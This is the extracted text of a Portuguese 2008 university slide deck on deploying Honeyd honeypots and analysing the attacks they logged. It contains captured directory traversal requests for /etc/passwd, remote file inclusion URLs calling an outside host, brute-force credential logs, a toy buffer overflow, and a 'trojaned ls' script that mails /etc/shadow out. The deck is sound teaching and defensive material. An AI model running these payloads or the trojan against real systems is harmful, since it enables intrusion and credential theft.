uso de honeypots com honeyd

Uso de HoneyPots com o Honeyd

Pedro Pereira Ulisses Costa

Criptografia e Seguranca de Sistemas de Informacao

18 de Dezembro de 2008

Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Sumario

1 IntroducaoHoneyPot’sHoneyd

2 LogLog principal do Honeyd

3 SMTPOpen mail relay

4 HTTPwebcollage/1.135aDirectory traversalMorfeus Scanner

WebCalendarMambo/JoomlaPrevenir ataques do Morfeus Scanner

Ataque ao POP3SSH

5 A ameaca


O que sao HoneyPot’s?

Programas que emulam vulnerabilidades conhecidas

Armadilhas para detectar ou impedir ataques


Tipos de HoneyPot’s

Personalidade

Alta interaccao (high-interaction)Baixa interaccao (low-interaction)

Modus operandi

ServidorCliente


Sumario






Ataque ao POP3SSH

5 A ameaca


Honeyd

Criacao de hosts virtuais

Configuracao dos hosts

Suporte para mais de 1000 personalidades

Muitas dezenas de scripts para emulacao de servicos


Configuracao do Honeyd

bash > farpd 192.168.1.50 -i eth0

# File: /etc/defaults/honeyd

# Defaults for honeyd initscript

# Correr como deamon

RUN="yes"

# Interface de rede onde o honeyd vai escutar pedidos

INTERFACE ="eth0"

# Rede que o honeyd simula

NETWORK =192.168.1.50

# Conjunto de opcoes

# -c hostname:port:username:password

OPTIONS="-c localhost :12345: username:password"


O comando -c hostname:port:username:password

Geracao de estatısticas parciais do Honeyd

bash > honeydstats --os_report /etc/honeypot/os --port_report /etc/honeypot/port\

--spammer_report /etc/honeypot/spam --country_report /etc/honeypot/country

\

-f /etc/honeypot/honeydstats.conf -l localhost -p 12345

# File: /etc/honeypot/honeydstats.conf

# Ficheiro de configuracao do honeydstats

username:password


Configuracao do HoneyPot(1/2)

# File: /etc/honeypot/honeyd.conf

# Configuracao do honeypot

create win2k

set win2k personality "Microsoft Windows 2000 SP2"

set win2k default tcp action reset

set win2k default udp action reset

set win2k default icmp action block

set win2k uptime 3567

add win2k tcp port 21 "sh /usr/share/honeyd/scripts/win32/win2k/msftp.sh $ipsrc

$sport $ipdst $dport"

add win2k tcp port 23 "perl /usr/share/honeyd/scripts/unix/linux/suse7 .0/ telnetd

.sh"

add win2k tcp port 25 "sh /usr/share/honeyd/scripts/win32/win2k/exchange -smtp.sh

$ipsrc $sport $ipdst $dport"

add win2k tcp port 80 "sh /usr/share/honeyd/scripts/win32/win2k/iis.sh $ipsrc


add win2k tcp port 110 "sh /usr/share/honeyd/scripts/win32/win2k/exchange -pop3.

sh $ipsrc $sport $ipdst $dport"

add win2k tcp port 143 "sh /usr/share/honeyd/scripts/win32/win2k/exchange -imap.

sh $ipsrc $sport $ipdst $dport"

add win2k tcp port 389 "sh /usr/share/honeyd/scripts/win32/win2k/ldap.sh $ipsrc


add win2k tcp port 5901 "sh /usr/share/honeyd/scripts/win32/win2k/vnc.sh $ipsrc


add win2k udp port 161 "perl /usr/share/honeyd/scripts/unix/general/snmp/fake -

snmp.pl\

public private --config=scripts/unix/general"


Configuracao do HoneyPot(2/2)

add win2k udp port 137 proxy $ipsrc :137



add win2k tcp port 137 proxy $ipsrc :137




bind 192.168.1.50 win2k$

Impossıvel monitorizar portos NETBIOS

Grade complexidade

Decisao reencaminhar para source

Inicializar o nosso HoneyPot:

bash > /etc/init.d/honeyd start


Sumario






Ataque ao POP3SSH

5 A ameaca


Ficheiros

/var/log/honeyd.txt SMTP, Telnet, IMAP, POP3

/var/log/honeypot/web.log HTTP

/var/log/honeypot/honeyd.log Log principal do Honeyd


Sumario






Ataque ao POP3SSH

5 A ameaca


Formato do ficheiro /var/log/honeypot/honeyd.log

Data Protocolo T IPOrig PortOrig IPDst PortDst Info Commentario. . . tcp(6) S 88.44.123.210 3637 . . . 139 [Windows XP SP1]. . . tcp(6) S 82.155.0.49 22617 . . . 139. . . tcp(6) E 82.155.1.160 4399 . . . 445: 0 0. . . tcp(6) - 82.155.122.18 61582 . . . 139: 40 R. . . icmp(1) - 80.236.5.27 . . . : 3(13): 56. . . tcp(6) - 82.154.64.174 34507 . . . 445: 40 RA. . . tcp(6) - 124.8.74.33 1806 . . . 25: 70 FPA [Windows XP SP1]. . . tcp(6) - 168.167.152.228 58274 . . . 445: 52 FA [Windows XP SP1]. . . tcp(6) - 168.167.152.228 58274 . . . 445: 52 FA. . . tcp(6) - 82.155.57.245 58274 . . . 445: 52 PA [Windows XP SP1]. . . tcp(6) - 193.136.19.149 58274 . . . 445: 52 PA. . . tcp(6) - 88.175.73.149 4332 . . . 139: 40 R [Windows XP SP1]. . . tcp(6) - 82.155.137.139 1230 . . . 445: 40 A [Windows XP SP1]. . . tcp(6) - 82.155.7.176 2794 . . . 445: 40 A. . . tcp(6) - 82.155.116.238 3578 . . . 23: 60 S [Linux 2.6 .1-7]. . . tcp(6) - 124.207.41.198 48804 . . . 23: 40 S. . . udp(17) - 192.168.1.254 67 . . . 68: 298

Data no formato: 2008-12-15-22:59:03.4039

IPDst e sempre o mesmo (neste caso) - 192.168.1.50


Formato do ficheiro /var/log/honeypot/honeyd.log

2009 -01 -01 -05:57:28.0971 tcp(6) S 79.25.93.226 46984 192.168.1.50 80

2009 -01 -01 -05:58:40.3750 tcp(6) E 79.25.93.226 46984 192.168.1.50 80: 150 1008

Para TCP e UDP nao sao gravadas todas as transmissoes depacotes

Seria demasiando verboso

Apenas a quantidade transmitida


Sumario






Ataque ao POP3SSH

5 A ameaca


SMTP

Usado do lado do servidor para enviar mensagens

Para receber usams POP3 ou IMAP


SMTP - HoneyPot


Comando EHLO em SMTP

Comando para identificar clientes


Comando EHLO em SMTP

S: 220 bps -pc9.local.mynet Microsoft ESMTP MAIL Service , Version: 5.0.2195.5329

ready at Sex Jan 9 22:10:11 WET 2009

C: EHLO windows

S: 250-bps -pc9.local.mynet Hello [12]

S: 250-TURN

S: 250-ATRN

S: 250-SIZE

S: 250-ETRN

S: 250- PIPELINING

S: 250-DSN

S: 250- ENHANCEDSTATUSCODES

S: 250-8 bitmime

S: 250- BINARYMIME

S: 250- CHUNKING

S: 250-VRFY

S: 250-X-EXPS GSSAPI NTLM LOGIN

S: 250-X-EXPS=LOGIN

S: 250-AUTH GSSAPI NTLM LOGIN

S: 250-AUTH=LOGIN

S: 250-X-LINK2STATE

S: 250- XEXCH50}

S: 250 OK

Identificacao por nomes de dominios nao reais


Spamm em servidores SMTP


Solucoes

EHLO [host]

verificar se resolvem


Sumario






Ataque ao POP3SSH

5 A ameaca


Ataques

HELO 82.155.248.223

MAIL FROM:<[email protected] >

RCPT TO:<[email protected] >

DATA

Subject: Super webscan open relay check succeded , hostname = 82.155.248.223

2008 -12 -11 -09:45:27.9566 tcp(6) S 124.11.193.219 2774 192.168.1.50 25 [Windows

XP SP1]

2008 -12 -11 -09:46:33.6989 tcp(6) E 124.11.193.219 2774 192.168.1.50 25: 178 920


Ataques

HELO 82.155.251.32

MAIL FROM:<[email protected] >

RCPT TO:<[email protected] >

DATA

Subject: Super webscan open relay check succeded , hostname = 82.155.251.32

2008 -12 -23 -12:18:11.3939 tcp(6) S 114.44.42.34 2748 192.168.1.50 25 [Windows XP

SP1]

2008 -12 -23 -12:18:11.3953 tcp(6) S 114.44.42.34 2750 192.168.1.50 25 [Windows XP

SP1]

2008 -12 -23 -12:18:12.1966 tcp(6) E 114.44.42.34 2750 192.168.1.50 25: 0 116

2008 -12 -23 -12:18:13.1996 tcp(6) E 114.44.42.34 2748 192.168.1.50 25: 0 232

2008 -12 -23 -12:21:55.1773 tcp(6) S 114.44.42.34 3347 192.168.1.50 25 [Windows XP

SP1]

2008 -12 -23 -12:21:57.1324 tcp(6) E 114.44.42.34 3347 192.168.1.50 25: 0 232

2008 -12 -23 -14:06:30.5003 tcp(6) S 114.44.42.34 1634 192.168.1.50 25 [Windows XP

SP1]

2008 -12 -23 -14:06:30.5023 tcp(6) S 114.44.42.34 1635 192.168.1.50 25 [Windows XP

SP1]

2008 -12 -23 -14:06:43.0390 tcp(6) E 114.44.42.34 1635 192.168.1.50 25: 177 335

2008 -12 -23 -14:06:51.4612 tcp(6) E 114.44.42.34 1634 192.168.1.50 25: 177 418


Ataques

HELO 82.155.103.147

MAIL FROM: <[email protected] >

RCPT TO: <[email protected]>

DATA

Received: from ([145.200.201.114])

by 82.155.103.147 id <9624303 -98482 >;

Tue , 06 Jan 2009 21:16:04 -0100

Message -ID: <w58\$6a4j1fqc6q@ocjc8ujvz >

From: "" <[email protected]>

To: <[email protected]>

Subject: BC_82 .155.103.147

Date: Tue , 06 Jan 09 21:16:04 GMT

MIME -Version: 1.0

Content -Type: multipart/alternative;

boundary="----= _NextPart_000_000D_01C2CC60 .49 F4EC70"


Sumario






Ataque ao POP3SSH

5 A ameaca


HTTP hit’s


Sumario






Ataque ao POP3SSH

5 A ameaca


User agent: webcollage/1.135a

--MARK --,"Mon Dec 15 23:09:00 WET 2008" ," IIS/HTTP

" ,"92.240.68.152" ,"192.168.1.50" ,56886 ,80 ,

"GET http ://www.morgangirl.com/pics/land/land1.jpg HTTP /1.0

User -Agent: webcollage /1.135a

Referer: http :// random.yahoo.com/fast/ryl

Host: www.morgangirl.com

",

--ENDMARK --

Tentativa de obter uma imagem atraves do HoneyPot

HoneyPotpode ter sido “visto” por um proxy scanner

HoneyPot como um proxy aberto


Sumario






Ataque ao POP3SSH

5 A ameaca


Directory traversal

Tambem conhecido como dot dot slash attack (../)

Explora a insuficiencia de validacao de pedidos

Ficheiros do sistema

GET ../../../../../../../../../../ etc/passwd HTTP /1.1

--MARK --,"Sun Jan 4 05:20:57 WET 2009" ," IIS/HTTP

" ,"82.173.198.254" ,"192.168.1.50" ,59706 ,80 ,

"GET %2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E

%2E%2F%2E%2E%2Fetc%2 Fpasswd HTTP /1.1

User -Agent: Nmap NSE

Connection: close

Host: 82.155.127.187

",

--ENDMARK --


Directory traversal

GET .../../../../../../../../../../ etc/passwd HTTP /1.1


" ,"82.173.198.254" ,"192.168.1.50" ,59711 ,80 ,

"GET %2E%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F

%2E%2E%2F%2E%2E%2Fetc%2 Fpasswd HTTP /1.1


Connection: close

Host: 82.155.127.187

",

--ENDMARK --


Directory traversal

GET ..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/ etc\/ passwd HTTP /1.1


" ,"82.173.198.254" ,"192.168.1.50" ,59727 ,80 ,

"

GET %2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E

%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2Fetc%5C%2 Fpasswd HTTP /1.1


Connection: close

Host: 82.155.127.187

",

--ENDMARK --


Directory traversal

GET ..\..\..\..\..\..\..\..\..\..\ etc\passwd HTTP /1.1


" ,"82.173.198.254" ,"192.168.1.50" ,59740 ,80 ,

"GET %2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E

%2E%5C%2E%2E%5Cetc%5 Cpasswd HTTP /1.1


Connection: close

Host: 82.155.127.187

",

--ENDMARK --


Directory traversal

GET //etc/passwd HTTP /1.1


" ,"82.173.198.254" ,"192.168.1.50" ,59700 ,80 ,

"GET %2F%2Fetc%2 Fpasswd HTTP /1.1


Connection: close

Host: 82.155.127.187

",

--ENDMARK --


Conclusao

No HoneyPot nao foi bem sucedido

Sistema de baixa interactividade

No nosso HoneyPot erro 302 Object moved

Utilizacao de NMap scripting engine


Sumario






Ataque ao POP3SSH

5 A ameaca


Morfeus Scanner

Procura vulnerabilidades PHP

Vulnerabilidades conhecidas


Morfeus Scanner - WebCalendar

Criacao de calendarios online

Vulnerabilidade no ficheiro send reminder.php

--MARK --,"Wed Dec 24 16:07:29 WET 2008" ," IIS/HTTP

" ,"74.52.10.34" ,"192.168.1.50" ,54941 ,80 ,

"GET /webcalendar/tools/send_reminders.php?noSet =0& includedir=http

://217.20.172.129/ twiki/a.gif?/ HTTP /1.1

Accept: */*

Accept -Language: en -us

Accept -Encoding: gzip , deflate

User -Agent: Morfeus Scanner

Host: 82.155.248.190

Connection: Close

",

--ENDMARK --


Morfeus Scanner - Mambo Joomla

CMS’s muito conhecido

O atacante pretende definir a variavelmosConfig absolute path do ficheiro index.php

--MARK --,"Wed Dec 24 16:07:34 WET 2008" ," IIS/HTTP

" ,"74.52.10.34" ,"192.168.1.50" ,55438 ,80 ,

"GET /shop/index.php?option=com_registration&task=register // boutique/index2.php?

_REQUEST =& _REQUEST %5 boption %5d=com_content&_REQUEST %5 bItemid %5d=1& GLOBALS =&

mosConfig_absolute_path=http ://217.20.172.129/ twiki/a.gif?/ HTTP /1.1

Accept: */*

Accept -Language: en -us

Accept -Encoding: gzip , deflate

User -Agent: Morfeus Scanner

Host: 82.155.248.190

Connection: Close

",

--ENDMARK --


Prevenir ataques do Morfeus Scanner

Uma maneira de bloquear este tipo de ataques vindos do MFS eadicionar as seguintes linhas de codigo no ficheiro “.htaccess” napasta do website.

# Start of .htaccess change.

RewriteEngine On

RewriteCond %{ HTTP_USER_AGENT} ^Morfeus

RewriteRule ^.*$ - [F]

# End of .htaccess change.


Sumario






Ataque ao POP3SSH

5 A ameaca


Tentativa de brute force no servidor POP3


Tentativa de brute force no servidor POP3

...

--MARK --,"Mon Dec 22 11:34:48 WET 2008" ," exchange/POP3

" ,"91.189.83.181" ,"192.168.1.50" ,54678 ,110 ,

"USER root

PASS root

",

--ENDMARK --


" ,"91.189.83.181" ,"192.168.1.50" ,54729 ,110 ,

"USER root

PASS root1

",

--ENDMARK --


" ,"91.189.83.181" ,"192.168.1.50" ,54731 ,110 ,

"USER staff

PASS staff

",

--ENDMARK --


" ,"91.189.83.181" ,"192.168.1.50" ,54774 ,110 ,

"USER root

PASS 12345

",

--ENDMARK --


" ,"91.189.83.181" ,"192.168.1.50" ,54774 ,110 ,

"USER www

PASS www

",

--ENDMARK --

...


Sumario






Ataque ao POP3SSH

5 A ameaca


SSH

Aqui esta um grafico que mostra as tentativas de usernames:


SSH

E o seguinte grafico mostra as tentativas de passwords:


Sumario






Ataque ao POP3SSH

5 A ameaca


A ameaca


Port scanning

Descobrir maquinas e respectivos portos

Criacao de pacotes personalizados

Dificil de dominar

NMap - insecure.org


Port scanning

Open ou Accepted : A maquina enviou uma resposta a indicarque um servico esta a escutar aquele porto;

Closed, Denied ou Not Listening : A maquina enviou umaresposta a indicar que qualquer conexao no porto sera negada;

Filtered, Dropped ou Blocked : Nao houve resposta por parteda maquina.


Port scanning

Tipos de tecnicas

TCP/SYN

TCP Connect

UDP


TCP Connect


Port scanning

Optimizacao

golden@golden -laptop :~$ sudo nmap -sS -sV 192.168.100.0/24

...

Nmap finished: 256 IP addresses (29 hosts up) scanned in 2033.375 seconds

golden@golden -laptop :~$ sudo nmap -sS -sV -P0 192.168.100.0/24

...

Nmap finished: 256 IP addresses (32 hosts up) scanned in 2038.191 seconds


Ataque

Forca bruta / Dicionarios

Exploracao de vulnerabilidades


SSH

Porto 22

Atacado em Forca bruta / Dicionarios

cat /var/log/auth.log


SSH - log

Dec 24 01:24:46 golden -laptop sshd [23906]: Invalid user oracle from

89.235.152.18

Dec 24 01:24:46 golden -laptop sshd [23906]: pam_unix(ssh:auth): check pass; user

unknown

Dec 24 01:24:46 golden -laptop sshd [23906]: pam_unix(ssh:auth): authentication

failure; logname= uid=0 euid=0 tty=ssh ruser= rhost =89.235.152.18

Dec 24 01:24:48 golden -laptop sshd [23906]: Failed password for invalid user

oracle from 89.235.152.18 port 48785 ssh2

Dec 24 01:24:49 golden -laptop sshd [23908]: reverse mapping checking getaddrinfo

for 89 -235 -152 -18. adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK -

IN ATTEMPT!

Dec 24 01:26:01 golden -laptop sshd [23963]: Invalid user test from 89.235.152.18


unknown



Dec 24 01:26:04 golden -laptop sshd [23963]: Failed password for invalid user test

from 89.235.152.18 port 57886 ssh2



IN ATTEMPT!

Dec 24 01:26:21 golden -laptop sshd [23975]: Invalid user cvsuser from

89.235.152.18


unknown



Dec 24 01:26:22 golden -laptop sshd [23975]: Failed password for invalid user

cvsuser from 89.235.152.18 port 59883 ssh2



IN ATTEMPT! Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

SSH

Defesa:

IPTablespasswords mais fortesAutenticacao RSA


SSH

password mınimo de 8 caracteres

password nao triviais

combinacoes alfanumericas

mnemonica: “Um Whiskey-Cola vale 3 euros no BA!” =“UW-Cv3enBA!”


SSH

http://www.passwordmeter.com/


SSH - Autenticacao RSA

1 Geramos o par de chaves com o comando “ssh-keygen -t rsa”.De seguida sao criados os ficheiros /.ssh/id rsa (chaveprivada) e /.ssh/id rsa.pub (chave publica)

2 Em cada maquina onde nos quisermos ligar (destino),colocamos a “id rsa.pub” gerada em /.ssh/authorized keysconcatenando o conteudo desta forma por exemplo: “catid rsa.pub >> /.ssh/authorized keys”

3 Em cada maquina de onde nos quisermos ligar (origem),colocamos a “id rsa” em /.ssh/

4 So falta desactivar o login baseado em password ao adicionara linha “PasswordAuthentication no” em /etc/ssh/sshd confige de seguida fazer restart ao daemon “sshd” atraves de“/etc/init.d/sshd restart”.


Vulnerabilidades

Comportamento nao previsto num artefacto de software

Buffer Overflow

Input nao validado

SQL Injection


Exploracao de vulnerabilidades

Exploit

E a designacao dada a um pedaco de codigo que serve paraexplorar falhas em aplicacoes de forma a causarem umcomportamento previamente nao antecipado nas mesmas.

#include <stdio.h>

#include <string.h>

int main(int argc , char *argv []) {

char buffer [10];

strcpy(buffer ,argv [1]);

printf(buffer);

return 0;

}


Buffer Overflow

user@honeypot :~$ gcc exploit.c -o exploit

user@honeypot :~$ ./ exploit thisisanexploit

*** stack smashing detected ***: ./ exploit terminated

thisisanexploitAborted

Um dos mecanismos de defesa do gcc


ShellCode

Um conjunto de instrucoes (em codigo maquina ou nao)desenvolvidas de maneira a que possam ser injectadas numaaplicacao em tempo de execucao.

Acesso ilegal a espaco de memoria nao autorizado

Injeccao do shellcode


RootKits

Conjunto de programas malicionsos (trojans, backdoors

chkrootkit e rkhunter (Linux)1;

RootkitRevealer (Windows).

1Ambos disponıveis no gestor de pacotes do Ubuntu.Pedro Pereira, Ulisses Costa Uso de HoneyPots com o Honeyd

Trojaned ls

#!/ bin/bash

mv /bin/ls /bin/ls.old

/bin/echo "cat /etc/shadow | mail [email protected]" > /bin/ls

/bin/echo "/bin/ls.old" >> /bin/ls

chmod +x /bin/ls


Conclusao


uso de honeypots com honeyd

Technology